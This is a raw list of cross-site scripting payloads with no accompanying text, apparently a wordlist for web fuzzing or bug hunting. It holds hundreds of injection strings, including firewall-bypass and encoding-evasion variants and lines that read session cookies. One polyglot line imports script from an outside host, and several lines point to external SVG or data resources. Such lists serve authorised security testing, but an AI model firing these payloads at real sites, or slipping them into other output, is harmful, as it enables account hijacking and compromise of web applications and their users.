1'"();<test><iframe onload="window.alert('XSS_WAF_BYPASS')"></iframe>
<body onload="window.alert('XSS_WAF_BYPASS')">
<link rel="stylesheet" href="#" onload="window.alert('XSS_WAF_BYPASS')">
1'"();<test><ScRiPt>alert("XSS_WAF_BYPASS")</ScRiPt>
"><img src=x onerror=prompt(document['domain']);>.asp
"><img src=x onerror=prompt(document['domain']);>.aspx
"><img src=x onerror=prompt(document['domain']);>.php
"><img src=x onerror=prompt(document['domain']);>.html
"><img src=x onerror=prompt(document['domain']);>.htm
"><svg onload=prompt(document.domain);>.asp
"><svg onload=prompt(document.domain);>.aspx
"><svg onload=prompt(document.domain);>.php
"><svg onload=prompt(document.domain);>.html
<!--><svg onload=alert(1)-->.asp
<!--><svg onload=alert(1)-->.aspx
<!--><svg onload=alert(1)-->.php
<!--><svg onload=alert(1)-->.html
"><img src=x onerror=prompt('document.domain');>.asp
"><img src=x onerror=prompt('document.domain');>.aspx
"><img src=x onerror=prompt('document.domain');>.php
"><img src=x onerror=prompt('document.domain');>.html
"><img src=x onerror=prompt('document.domain');>.htm
<script>alert(1)</script>.asp
<script>alert(1)</script>.aspx
<script>alert(1)</script>.php
<script>alert(1)</script>.html
<script>alert(1)</script>.htm
<ScRiPt>alert(1)</ScRiPt>
<s%00c%00r%00i%00p%00t>alert(1)</script>
&#x3c;script&#x3e;alert(1)&#x3c;/script&#x3e;
<img src="x" onerror="alert(1)">
<script>eval(String.fromCharCode(97,108,101,114,116,40,49,41))</script>
%3cscript%3ealert(1)%3c/script%3e
&#60;svg/onload=alert(1)&#62;
&#60;script&#62;alert(1)&#60;/script&#62;
--><svg onload=alert(1)>
aaaaa\”-confirm`1`//
\”-confirm`1`//
%3C%2Fscript%3E%3Cscript%3Econfirm%28document.domain%29%3C%2Fscript%3E
";}(document.writeln(decodeURI(location.hash))-"#<iframe src=javascript:alert(document.domain)
javascript://%250Aalert(1)
mitsecXSS%22%3E%3Cinput%20%00%20onControl%20hello%20oninput=confirm(1)%20x%3E
&#34;&gt;&lt;track/onerror=&#x27;confirm\%601\%60&#x27;&gt;
"><track/onerror='confirm`1`'>
<a href="javascript:alert(1)">a</a>
<iframe src="javascript:alert(1)"></iframe>
eval('alert(1)');
\u0061\u006c\u0065\u0072\u0074(1)
<svg><script>a<!>l<!>e<!>r<!>t<!>(<!>1<!>)</script>
'"><script>alert(2);</script>
%3E'><script>alert(2);</script>
%22-[9].every(alert)-%22//
%22%3E'><script>alert(2);</script>
%E2%80%9C%3E%3CSvG%2Fonload%3Dalert%28document.domain%29%3E
%0Ajavascript%3Ato%0ap%5B%27ale%27%2B%27rt%27%5D%28top%5B%27doc%27%2B%27ument%27%5D%5B%27dom%27%2B%27ain%27%5D%29%3B%0A/%0A/%0A
%27%3E'><script>alert(2);</script>
%22%27%3E'><script>alert(2);</script>
'> <script>alert(2);</script>
'>'><SCript>alert(2);</script>
%27%3E%27%3E%22%3E%script%3Ealert(2);%3C/script%3E
'>👽💻🔥<script>alert(2);</script>
'>'+'><script>alert(2);</script>
&#62;'&gt;"<script>alert(2);</script>
'&#x3E;'>"><script>alert(2);</script>
<img src=x onerror=alert('from\u0020subcat\u0020title')>
"><img src=a onerror=alert(document.location)>
"><svg/onload=prompt('Supakiad-S. (m3ez)', document.domain)​>
"><A%20%252F=""Href=%20JavaScript:k='%22',top[k+'lert']('XSS')">
'%27%3E%27%22%3E%3Cscript%3Ealert(2);%3C/script%3E'
'\u003E'\u0022><script>alert(2);</script>
'>'\n><script>alert(2);</script>
'&#x3E;'><script>alert(2);</script>
'>&lt;/b&gt;&lt;script&gt;alert(document.cookie)&lt;/script&gt;&lt;b&gt;&lt;!--
'><!--"/><style>@import 'data:text/css;base64,YWxlcnQoZG9jdW1lbnQuY29va2llKSk=';</style><b><!--
'>&lt;/b&gt;%3Cscript%3Ealert(document.cookie)%3C/script%3E%3Cb&gt;&lt;!--
'\u003e\'</b><script>alert(document.cookie)</script><b><!--'
'+ '</b><script>alert(document.cookie)</script><b><!--'
(function(){alert(document.cookie)})();
"alert(document.cookie)['script'](2);"
'});alert(document.cookie);//'
'><scr'+'ipt>alert(document.cookie)</scr'+'ipt><b><!--
');alert(document.cookie)();//
'\u0029\u0028};alert(document.cookie);//"
"><svg/onload=alert(1);>
"><iframe onload=alert(1);>
"><audio onplay=alert(1);>
"><img src="javascript:alert(1);" />
%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert(1)%3B%3E
%22%2525%2F%28%29%2C%20alert%281%29%3B%27%3E%3Cimg%20src%3Dx%20onerror%3Dalert(1)%3B%3E%3Cscript%3E
%3C%25%69%6D%67%20%73%72%63%3D%78%20%6F%6E%65%72%72%6F%72%3D%70%72%6F%6D%70%74%28%64%6F%63%75%6D%65%6E%74%2E%64%6F%6D%61%69%6E%29%3B%3E
%22%3E%3C%69%6D%67%20%73%72%63%3D%78%20%6F%6E%65%72%72%6F%72%3D%70%72%6F%6D%70%74%28%64%6F%63%75%6D%65%6E%74%2E%64%6F%6D%61%69%6E%29%3B%3E
%2522%3E%3C%69%6D%67%20%73%72%63%3D%78%20%6F%6E%65%72%72%6F%72%3D%70%72%6F%6D%70%74%28%64%6F%63%75%6D%65%6E%74%2E%64%6F%6D%61%69%6E%29%3B%3E
"><img src=x onerror=prompt(document.domain);<<
"><img src=x onerror=prompt(document['domain']);>
"><img src=x onerror=this.innerHTML=''><script>alert(document.domain)</script>">
"><img src=x onerror=eval('prompt(document.domain)')>
"><img src=x id="img"> <script>document.getElementById('img').addEventListener('error', function(){prompt(document.domain);})</script>
"><img src=x onerror=prompt(document.domain);>
"><img src=x><img src= onerror=prompt(document.domain);>
PHNjcmlwdD5pbWcgc3JjPXggb25lcnJvci5wcm9tb3RlKHRy
&quot;&gt;&lt;img src=x onerror=prompt(document.domain);&gt;
%253C%2531%2533%2533%253E%253C%2539%253E%253C%2569%253D%2538%253B%253E%253C%253F%256A%2532%253E%253C%252F%2563%253E%253C%252F%2573%2563%2568%2572%2569%2570%2574%253E
&lt;&lt;img src=x onerror=prompt(document)&gt;&gt;;
"><img\ src=x\ onerror=prompt(document.domain);>
"><img src=x onerror="prompt(document.domain);">
"><img src=x onerror=prompt(document&#46;domain);>
"><img src=x onerror=prompt(document%2Edomain);>
"><img src=x onerror=prompt(String.fromCharCode(100, 111, 99, 117, 109, 101, 110, 116, 46, 100, 111, 109, 97, 105, 110));>
"><img src=x onerror=prompt(unescape('document%2Edomain'));>
"><svg onload=prompt(document.domain);>
"><img src=x onerror=prompt(document.domain); title=x>
"><div style="background-image: url(x)" onerror=prompt(document.domain);>
"><script>var img=document.createElement('img');img.src='x';img.onerror=function(){prompt(document.domain);};document.body.appendChild(img);</script>
<scr'+'ipt>alert(1)</scr'+'ipt>
\<script\>alert(1)\<\/script\>
<script>alert\u00281\u0029</script>
%3Cscript%3Ealert(1)%3C/script%3E
"><IMG SRC=x ONERROR=prompt(document.domain);>
"><img src=/x onerror=prompt(document.domain);>
"><img src="x" onerror="prompt(document.domain);">
"><img src='x' onerror='prompt(document.domain);'>
"><img src=x onerror=(prompt(document.domain));>
"><img src=x onerror=prompt(document.domain);>
"><img src=x&#9;onerror=prompt(document.domain);>
"><img src=x onerror=prompt('document.domain');>
"><img src=x id=img> <script>document.getElementById('img').addEventListener('error',function(){prompt(document.domain);})</script>
"><img src=x style=content:'x' onerror=prompt(document.domain);>
"><img src=data:, onerror=prompt(document.domain);>
"><img src=x alt=x onerror=prompt(document.domain);>
%22%3E%3Cimg%20src=x%20onerror=prompt(document.domain);%3E
%22%3E%3Cimg%09src%3Dx%09onerror%3Dprompt(document.domain);%3E
"><img src=x ONERROR=prompt(document.domain);>
"><img src=x onmouseover=prompt(\u0064ocument.domain);>
"><link rel="stylesheet" href="style.css"><img src=x onerror=prompt(document.domain);>
"><svg><img src=x onerror=prompt(document.domain);></svg>
'--><img src=x onerror=prompt(document.domain);><!--
"><img/src/onerror=alert(`ibro`)>
"<div style="background-image: url(x)" onerror=prompt(document.domain);>
\"><img src=x onerror=prompt(document.domain);>
"><img src:x onerror=prompt(document.domain);>
"><img src=x\%28\%29\ onerror=prompt(document.domain);>
">&lt;img src=x onerror=prompt(document.domain);&gt;
"%3E<img src=x onerror=prompt(document.domain);%3E"
"><img src=x onerror=prompt(document.domain);String.fromCharCode(62);">
">\<img src=x onerror=prompt(document.domain);\>\;\>\<\>"
%0d%0a%0d%0a<script>alert(document.domain)</script>
>'>"><script>alert();</script>
>'>"><svg/onload=alert(document.domain)>
javascript:alert(1);/////
"><img src=x onerror='alert(document.domain)'>
'"/><img src= x onerror='alert(document.domain)'>
'"/><img src= x onerror=prompt(/xss/)>
<img src='test' onmouseover='alert(2)'>
/><script>window.alert('XSS Vulnerable');</script>
#<script>alert(document.domain)</script>
</style></script><script>alert("XSS")</script>
<script>String.fromCharCode(97, 108, 101, 114, 116, 40, 34, 104, 105, 34, 41, 59)</script>
%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%22%48%69%22%29%3b%3c%2f%73%63%7
<ScRipt>ALeRt("hi");</sCRipT>
"};alert(23);a={"a":
#<><img src=1 onerror=alert(1)>
"></select><img%20src=1%20onerror=alert(1)>
{{$on.constructor('alert(1)')()}}
\"-alert(1)}//
eyJ0eXBlIjoibnVsbCIsImh0bWwiOiI8c2NyaXB0PmFsZXJ0KCdYU1MgUE9DIGJ5IERFREknKTwvc2NyaXB0PiJ9
><sVg%2Fonload%3Dalert%281%29+class%3Dikhsan>
q="><img/src/onerror=.1|alert`` class=d>
search?q=javascript:alert(document.domain)
#javascript:alert(document.domain)
<><img src=1 onerror=alert(1)>
<img src=1 onerror=print()>
%27x%27onclick=%27alert(1)
</script><script>alert(1)</script>
"><sVg%2fonload%3dalert%2ebind%28%29%281%29%20class%3dRahul-Dh>
“><img only src=1 onerror=alert()>
<svg/ONxss='0'/ONload=location=window[`atob`]`amF2YXNjcmlwdDphbGVydCgxKQ==`;
<img+src%3dOnXSS+OnError%3dalert('XSs-Cloudflare-bypass-By-Dedi')>
<Img Src=OnXSS OnError=prompt(document.cookie)>
</script><svg/pnload=prompt(1)>
<sCript>confirm()</sCript>
"><SVG ONLOAD=&#97&#108&#101&#114&#116(&#x64&#x6f&#x63&#x75&#x6d&#x65&#x6e&#x74&#x2e&#x64&#x6f&#x6d&#x61&#x69&#x6e)>
%22%3e%3c%53%56%47%20%4f%4e%4c%4f%41%44%3d%26%23%39%37%26%23%31%30%38%26%23%31%30%31%26%23%31%31%34%26%23%31%31%36%28%26%23%78%36%34%26%23%78%36%66%26%23%78%36%33%26%23%78%37%35%26%23%78%36%64%26%23%78%36%35%26%23%78%36%65%26%23%78%37%34%26%23%78%32%65%26%23%78%36%34%26%23%78%36%66%26%23%78%36%64%26%23%78%36%31%26%23%78%36%39%26%23%78%36%65%29%3e
<img src=x onerror=prompt()>
JavaScript://%250A/*?'/*\'/*"/*\"/*`/*\`/*%26apos;)/*<!--></Title/</Style/</Script/</textArea/</iFrame/</noScript>\74k<K/contentEditable/autoFocus/OnFocus=/*${/*/;{/**/(import(/https:\\X55.is/.source))}//\76-->
javascript:var{a:onerror}={a:alert};throw%20document.domain
<svg onload=alert(1)//
java%0d%0ascript%0d%0a:alert(document.domain);//
&lt;img src=x onerror=alert()>
\'-alert(1)//
#\'-alert(1)//
-alert(1)-&apos;
' onerror='alert("xss")'>
<img src="invalid-image" onerror="alert('XSS');">
#<img src="invalid-image" onerror="alert('XSS');">
<img src=x onerror="prompt(1)">aaaaaaaaaaaa
/cpanelwebcall/<img src=x onerror="prompt(1)">aaaaaaaaaaaa
</script><svg/onload=alert(0)>
"><body/oNpagEshoW=(confirm)(document.domain)>
"<IMG DYNSRC=\"javascript:alert('XSS');\">"
[email protected]\u003C/script\u003E\u003Cscript\u003Ealert(document.domain)//
test<i>test</i><a onmouseover="alert(document.cookie)">
//j\\javascript:alert(document.domain)
<p><img/src/onerror=alert(`ibro`)></p>
('+'alert(1)+')();
.alert(1);
'></script><svg/onload=alert(document.cookie)>
//j%5c%5cjavascript%3aalert(document.domain)
javascript:(alert('XSS Success!'))()
#javascript:(alert('XSS Success!'))()
#"><svg onload=alert(1)>
%3Cimg%20src%3D1%20onerror%3Dalert%281%29%3E
嘼img src=1 onerror=alert(1)嘾
嘾嘾<script>alert(2);</script>
嘼svg><script>a<!>l<!>e<!>r<!>t<!>(<!>1<!>)</script>
嘼"><svg onload=prompt(document.domain);>
%E5%98%8D%E5%98%8A%E5%98%8D%E5%98%8A%E5%98%8D%E5%98%8A%E5%98%BCscript%E5%98%BEalert(1);%E5%98%BC/script%E5%98%BE
"><u>XSS</u><marquee+onstart='alert(document.cookie)'>XSS
{{window['eval'](window['atob'](window['decodeURIComponent']('Ij48aW1nIHNyYz14IG9uZXJyb3I9cHJvbXB0KGRvY3VtZW50LmNvb2tpZSk7PjEy')))}}
data:text/html;base64,Ij48aW1nIHNyYz14IG9uZXJyb3I9cHJvbXB0KGRvY3VtZW50LmNvb2tpZSk7PjEy
data:text/html;base64,ewoidXJsIjoiaHR0cHM6Ly9zdGFuZGluZy1zYWx0LnN1cmdlLnNoL3Rlc3QueWFtbCIKfQ==
///%01javascript:alert(document.cookie)/
javascript:alert(document.domain);
xss"</sc"ript><sv"g/onloa"d=aler"t"(document.doma"in)>
0xd3adc0de<ScRiPt>alert('XSS Success!')</sCripT>
0xd3adc0de&lt;ScRiPt&gt;alert('XSS Success!')&lt;/sCripT&gt;
</b><script>alert(document.cookie)</script><b><!--
</title><script>alert(document.domain)</script>
ryp3i"accesskey="x"onclick="alert(1)"//opk15
#<ScRiPt>alert(1)</ScRiPt>#
"'><svg/onload=confirm(666)>
#"'><svg/onload=confirm(666)>
'x'%20onclick='confirm`1`'
'confirm(document.domain)'>
#'confirm(document.domain)'>
#</script><script>alert(1)</script>
;</script><embed/test='asdf'/sr%00c='/'>
"><svg onmouseover="confirm&#0000000040document.domain)
${alert(1)}
d1bvs%3c%2fscript%3e%3cscript%3ealert(`XSS`)%3c%2fscript%3ec579g
d1bvs</script><script>alert(`XSS`)</script>c579g
javascript%3avar{a%3aonerror}%3d{a%3aalert}%3bthrow%2520document.domain
https://me6.com/aem/xss2.svg
<Img Src=OnXSS OnError=confirm(1)>
/*\"<sVg/oNloAd=alert(document.domain)//>\x3e
<svg></p><style><g title="</style><img src onerror=alert(document.domain)>">
"/>"/><img src=xss onerror=alert(2)>
/><svg src=x onload=confirm(document.domain);>
</h1><script>alert(1)</script><h1>
</script><body/onload=alert(m3ez)>
<img/src/onerror=setTimeout(atob(/YWxlcnQoMTMzNyk/.source))>
"onmouseover="alert(document.cookie)"><!--
<script>alert(1234)</script>
<script>prompt(1234)</script>
<ScripT>alert(1234)</ScRipT>
/<script>alert(1234)</script>
#/<script>alert(1234)</script>
<IMG+DYNSRC="javascript:alert(1);">
<IMG+LOWSRC="javascript:alert(1);">
<isindex+type=image+src=1+onerror=alert(1)>
<meta style="xss:expression(open(alert(1)))" />
<!</textarea <body onload='alert(1)'>
<img+<iframe ="1" onerror="alert(1)">
<base+href="javascript:alert(1);//">
<bgsound+src="javascript:alert(1);">
<INPUT+TYPE="IMAGE"+SRC="javascript:alert(1);">
<object+data="javascript:alert(0)">
<STYLE>li+{list-style-image:url("javascript:alert(1)");}</STYLE><UL><LI>1
%3E%3Cbody%20onload=javascript:alert(1)%3E
'">><marquee><h1>1</h1></marquee>
</br style=a:expression(alert(1))>
<font style='color:expression(alert(1))'>
<embed src="data:image/svg+xml;>
"/>%3ciframe%20src%3djavascript%3aalert%283%29%3e
<object><param name="src" value="javascript:alert(0)"></param></object>
<isindex action=javascript:alert(1) type=image>
<b/alt="1"onmouseover=InputBox+1 language=vbs>test</b>
</a onmousemove="alert(1)">
'%26%26'javascript:alert%25281%2529//
<scr<script>ipt>prompt(document.cookie)</scr</script>ipt>
12&<script>alert(123)</script>=123
<img src=x:alert(alt) onerror=eval(src) alt=0>
<img src=/ onerror=alert(1)>
<img/src="xss.png"alt="xss">
<x:script xmlns:x="http://www.w3.org/1999/xhtml">alert(1);</x:script>
<scr<script>ipt>alert('XSS')</scr</script>ipt>
foo%00<script>alert(document.cookie)</script>
x"><svg%0Donload="window['alert'](document.cookie)">
x'><svg%0Donload='window["alert"](document.cookie)'>
x"><svg%0Donload="window['alert'](document['cookie'])">
x"><svg%0Donload="window['alert']((document)['cookie'])">
x\"><svg%0Donload=\"window[\'alert\']((document)[\'cookie\'])\">
x"><svg%0Donload=`window['alert']((document)['cookie'])`>
x"><svg%0Donload=`window["alert"](((document)['cookie']))`>
"><<script>alert(document.cookie);//<</script>
><s"%2b"cript>alert(document.cookie)</s"%2B"cript>
#%3Cscript%3Ealert('XSS')%3C%2Fscript%3E
<script>alert(['X','S','S'].join(''))</script>
3Cscript%3Ealert(1)%3C%2Fscript%3E
%253Cscript%253Ealert(1)%253C/script%253E
%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%31%29%3c%2f%73%63%72%69%70%74%3e
#%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%31%29%3c%2f%73%63%72%69%70%74%3e
%BCscript%BEalert(%A21%A2)%BC/script%BE
%C0%BCscript%C0%BEalert(1)%C0%BC/script%C0%BE
<svg onload=alert&#0000000040document.cookie)>
";(a=alert,b=1,a(b))
"<iframe src=j&#x61;vasc&#x72ipt&#x3a;alert&#x28;1&#x29; >"
x"><svg%0Donload="window['alert'](document['cookie'])"
<iframe src="data:text/html,<script>alert(1)</script>"></iframe>
<object+data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></object>
<a HREF="data:text/html;base64,PHNjcmlwdD5hbGVydCgwKTwvc2NyaXB0Pg==">ugh</a>
PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==
<a+href="javas&#99;ript&#35;alert(1);">
<IMG+SRC=j&#X41vascript:alert(1)>
<IMG+SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#39;&#41;>
<IMG+SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000039&#0000041>
%u0022%u003e%u003cscript%u003ealert%u0028%u0027Hello%u0027%u0029%u003c%u002fscript%u003e
+ADw-SCRIPT+AD4-alert(1);+ADw-/SCRIPT+AD4-
<INPUT+TYPE="checkbox"+onDblClick=confirm(XSS)>
alert(String.fromCharCode(88))</SCRIPT>
&lt;script&gt;prompt(&apos;1&apos;)&lt;/script&gt;
&#x3c;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x3e;&#x61;&#x6c;&#x65;&#x72;&#x74;&#x28;&#x27;&#x78;&#x73;&#x73;&#x27;&#x29;&#x3c;&#x2f;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x3e;
&#x60;&#x115;&#x99;&#x114;&#x105;&#x112;&#x116;&#x62;&#x97;&#x108;&#x101;&#x114;&#x116;&#x40;&#x39;&#x120;&#x115;&#x115;&#x39;&#x41;&#x60;&#x47;&#x115;&#x99;&#x114;&#x105;&#x112;&#x116;&#x62;
=<img%20src%3D%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x3a;alert%26%23x28;1%26%23x29;>
"+style%3d"x%3aexpression(alert(1))+
\";alert(1);//
#\";alert(1);//
<img src="x:%90" title="onerror=alert(1)//">
"+onkeypress="prompt(23)"+
"+onfocus="prompt(1)"+
alert(document['cookie'])
#alert(document['cookie'])
with(document)alert(cookie)
";location=location.hash)//#0={};alert(0)
";alert(String.fromCharCode(88,83,83))
"+onDblClick=prompt(123)"+
"+onError=prompt(123)"+
";eval(unescape(location))//#%0Aprompt(0)
%'});%0aalert(1);%20//
<IMG+SRC="jav&#x0A;ascript:alert(1);">
<IMG+SRC="jav#x0D;ascript:alert(1);">
"jav&#x09;ascript:alert(1);">
#"jav&#x09;ascript:alert(1);">
%3Cscript%3Ealert(1)%3C/script%00TESTTEST%3E
<script%00>alert(1)</script%00>
<scr%00ipt>prompt(1)</sc%00ript>
%3Cscript%0Caaaaa%3Ealert%28123%29%3C/script%0Caaaaa%3E
%3Cscript%0Baaa%3Ealert%281%29%3C/script%3E
<*script>prompt(123)<*/script>
<script%20TEST>alert(1)</script%20TESTTEST>
<<SCRIPT>alert(1);//<</SCRIPT>
<script>a\u006cert(1);</script>
<script>eval(‘a\u006cert(1)’);</script>
<script>eval(‘a\x6cert(1)’);</script>
<script>eval(‘a\154ert(1)’);</script>
<script>eval(‘a\l\ert\(1\)’);</script>
<script>eval(‘al’+’ert(1)’);</script>
<script>eval(String.fromCharCode(97,108,101,114,116,40,49,41));</script>
<script>eval(atob(‘amF2YXNjcmlwdDphbGVydCgxKQ’));</script>
<script>’alert(1)’.replace(/.+/,eval)</script>
<script>function::[‘alert’](1)</script>
<script>alert(document[‘cookie’])</script>
<script>with(document)alert(cookie)</script>
<script><script>alert(1)</script>
<scr<script>ipt>alert(1)</script>
<scr<object>ipt>alert(1)</script>
</script><script>alert(1)</script>
<noscript><p title="</noscript><img src=x onerror=([,O,B,J,E,C,,]=[]+{},[T,R,U,E,F,A,L,S,,,N]=[!!O]+!O+B.E)[X=C+O+N+S+T+R+U+C+T+O+R][X](A+L+E+R+T+(document.cookie))()>">
\uff1c\uff53\uff43\uff52\uff49\uff50\uff54\uff1e\uff41\uff4c\uff45\uff52\uff54\uff08\uff07\uff58\uff53\uff53\uff07\uff09\uff1c\uff0f\uff53\uff43\uff52\uff49\uff50\uff54\uff1e
%uff1cscript%uff1ealert(1234)%uff1c/script%uff1e
javascript:eval(unescape(location.href))
1&"><script>alert(1)</script>=1
#1&"><script>alert(1)</script>=1
</scr</script>ipt><ifr<iframeame/onload=prompt()>whs
<script>alert(“xss”)</script>
<img src=x onerror=alert(“falcon”)>
<script>alert(document.domain)</script>
<img src=x onerror=alert(document.domain)>
<body onload=alert(“bingo”)>
#<body onload=alert(“bingo”)>
<Script>alert()</Script>
<svg/onload=alert(“Hacked”)>
#<svg/onload=alert(“Hacked”)>
&lt;script&gt;alert(&#39;123&#39;);&lt;/script&gt;
<img src=x onerror=alert(123) />
<svg><script>123<1>alert(123)</script>
"><script>alert(123)</script>
'><script>alert(123)</script>
><script>alert(123)</script>
</script><script>alert(123)</script>
< / script >< script >alert(123)< / script >
onfocus=JaVaSCript:alert(123) autofocus
"onfocus=JaVaSCript:alert(123) autofocus
<script>alert(123)</script>
%20<script>alert(1)</script>
%E5%98%8D%E5%98%8A%20<script>alert(1)</script>
%0d%0a%20<script>alert(1)</script>
%3F%20<script>alert(1)</script>
%20"><svg onload=alert(1)>
%E5%98%8D%E5%98%8A%20"><svg onload=alert(1)>
%0d%0a%20"><svg onload=alert(1)>
%3F%20"><svg onload=alert(1)>
%20<img src=1 onerror=alert(1)>
%E5%98%8D%E5%98%8A%20<img src=1 onerror=alert(1)>
%0d%0a%20<img src=1 onerror=alert(1)>
%3F%20<img src=1 onerror=alert(1)>
%20javascript:alert(1)
%E5%98%8D%E5%98%8A%20javascript:alert(1)
%0d%0a%20javascript:alert(1)
%3F%20javascript:alert(1)
%20"><img src=q onerror=alert(1)>
%E5%98%8D%E5%98%8A%20"><img src=q onerror=alert(1)>
%0d%0a%20"><img src=q onerror=alert(1)>
%3F%20"><img src=q onerror=alert(1)>
%20"><img src=x onerror=prompt(document.domain);>
%E5%98%8D%E5%98%8A%20"><img src=x onerror=prompt(document.domain);>
%0d%0a%20"><img src=x onerror=prompt(document.domain);>
%3F%20"><img src=x onerror=prompt(document.domain);>
%20<script>prompt(document.domain)</script>
%E5%98%8D%E5%98%8A%20<script>prompt(document.domain)</script>
%0d%0a%20<script>prompt(document.domain)</script>
%3F%20<script>prompt(document.domain)</script>
%20<img/src/onerror=alert(ibro`)>
%E5%98%8D%E5%98%8A%20<img/src/onerror=alert(ibro`)>
%0d%0a%20<img/src/onerror=alert(ibro`)>
%3F%20<img/src/onerror=alert(ibro`)>
%20<body onload=alert("bingo")>
%E5%98%8D%E5%98%8A%20<body onload=alert("bingo")>
%0d%0a%20<body onload=alert("bingo")>
%3F%20<body onload=alert("bingo")>
%20%3Cimg%20src=1%20onerror=alert(1)%3E
<sc<script>ript>alert(123)</sc</script>ript>
--><script>alert(123)</script>
";alert(123);t="
';alert(123);t='
#';alert(123);t='
JavaSCript:alert(123)
;alert(123);
src=JaVaSCript:prompt(132)
"><script>alert(123);</script x="
'><script>alert(123);</script x='
><script>alert(123);</script x=
" autofocus onkeyup="javascript:alert(123)
<script\x20type="text/javascript">javascript:alert(1);</script>
'`"><\x3Cscript>javascript:alert(1)</script>
ABC<div style="x:expression\x5C(javascript:alert(1)">DEF
ABC<div style="x:\xE3\x80\x80expression(javascript:alert(1)">DEF
<a href="\x0Bjavascript:javascript:alert(1)" id="fuzzelement1">test</a>
`"'><img src=xxx:x \x0Aonerror=javascript:alert(1)>
"`'><script>\x3Bjavascript:alert(1)</script>
<img \x00src=x onerror="alert(1)">
<a href=java&#1&#2&#3&#4&#5&#6&#7&#8&#11&#12script:javascript:alert(1)>XXX</a>
<img src onerror /" '"= alt=javascript:alert(1)//">
<a href=http://foo.bar/#x=`y></a><img alt="`><img src=x:x onerror=javascript:alert(1)></a>">
<!--[if]><script>javascript:alert(1)</script-->
<!--xss"><img src=x onerror=alert(1)>-->
<!--[if<img src=x onerror=javascript:alert(1)//]>-->
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
<IMG onmouseover="alert('xxs')">
<IMG SRC="jav&#x0D;ascript:alert('XSS');">
<IMG SRC="javascript:alert('XSS')"
<body language=vbs onload=confirm-1
"<body/onload=&lt;!--&gt;&#10confirm(1);prompt(/XSS/.source)>"
"\"><body/onload=&lt;!--&gt;&#10confirm(1);prompt(/XSS/.source)>",
<button autofocus onfocus=confirm(2)>
'`"><*chr*script>log(*num*)</script>
"><img src="/" =_=" title="onerror='prompt(1)'">
<img language=vbs src=<b onerror=confirm#1/1#>
"]<img src=1 onerror=confirm(1)>
#"]<img src=1 onerror=confirm(1)>
/#<img src=1 onerror=javascript:confirm(3)>
"><img src=javascript:while([{}]);>
<img/ src//'onerror/''/=confirm(1)//'>
"\"><img src=\"x\" onerror=\"confirm(0)\"/>",
<img src=x onerror=URL='javascript:confirm(1)'>
#<img src=x onerror=URL='javascript:confirm(1)'>
"><img src=x onerror=prompt(1);>
"><img src=x onerror=confirm('x') />]
"><img src=x onerror=prompt(document.cookie);>
%22%3E%3Cimg%20src%3Dx%20onerror%3Dprompt%28document.cookie%29%3B%3E
#%22%3E%3Cimg%20src%3Dx%20onerror%3Dprompt%28document.cookie%29%3B%3E
%2522%253E%253Cimg%2520src%253Dx%2520onerror%253Dprompt%2528document.cookie%2529%253B%253E
Ij48aW1nIHNyYz14IG9uZXJyb3I9cHJvbXB0KGRvY3VtZW50LmNvb2tpZSk7Pg==
<img src=xx: onerror=confirm(document.location)>
<--`<img/src=` onerror=confirm(1)> --!>
<img/src=x alt=confirm(1) onmouseover=eval(alt)>
><imgsrc=x onerror=confirm.onerror=confirm(1)>
"><input value=<><iframe/src=javascript:confirm(1)
</plaintext\></|\><plaintext/onmouseover=prompt(1)
"<script>1-confirm(0);</script>"/>
"/><script>+-+-1-+-+confirm(1)</script>
<script>(0)['constructor']['constructor']("\141\154\145\162\164(1)")();</script>
<script>+-+-1-+-+confirm(1)</script>
"<script>'confirm(0)%3B<%2Fscript>"
"\"><script>'confirm(0)%3B<%2Fscript>",
<script>'confirm(0)%3B<%2Fscript>
"'`><script>log*chr*(*num*)</script>
</script><svg onload='-/"/-confirm(1)//'"
<script>x=""-prompt(9)-"";y=42;</script>
<svg id=1 onload=confirm(1)>
#<svg id=1 onload=confirm(1)>
<svg onload=confirm(1)
"><svg onload="confirm(7)">
<svg onload="confirm(7)">
<svg onload=eval(URL)>
<svg onload=eval(document.cookie)>
<svg onload=eval(window.name)>
\x3Cscript>javascript:alert(1)</script>
'"`><script>/* *\x2Fjavascript:alert(1)// */</script>
<!--\x3E<img src=xxx:x onerror=javascript:alert(1)> -->
--><!-- ---> <img src=xxx:x onerror=javascript:alert(1)> -->
<a href="\x1Ajavascript:javascript:alert(1)" id="fuzzelement1">test</a>
"`'><script>\x09javascript:alert(1)</script>
<IMG SRC=javascript:alert("XSS")>
<IMG SRC=`javascript:alert("RSnake says, 'XSS'")`>
<script src="data:text/javascript,alert(1)"></script>
<iframe/src \/\/onload = prompt(1)
<iframe/onreadystatechange=alert(1)
<svg/onload=alert(1)
\<a onmouseover="alert(document.cookie)"\>xxs link\</a\>
<IMG """><SCRIPT>alert("XSS")</SCRIPT>"\>
<IMG SRC= onmouseover="alert('xxs')">
<IMG SRC=/ onerror="alert(String.fromCharCode(88,83,83))"></img>
<IMG SRC="jav ascript:alert('XSS');">
<IMG SRC="jav&#x09;ascript:alert('XSS');">
<IMG SRC=" &#14; javascript:alert('XSS');">
<IMG SRC="('XSS')"
\";alert('XSS');//
</TITLE><SCRIPT>alert("XSS");</SCRIPT>
<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
<IMG LOWSRC="javascript:alert('XSS')">
<IMG SRC='vbscript:msgbox("XSS")'>
<IMG SRC="livescript:[code]">
Set.constructor`alert\x28document.domain\x29
<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>
<XSS STYLE="xss:expression(alert('XSS'))">
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>
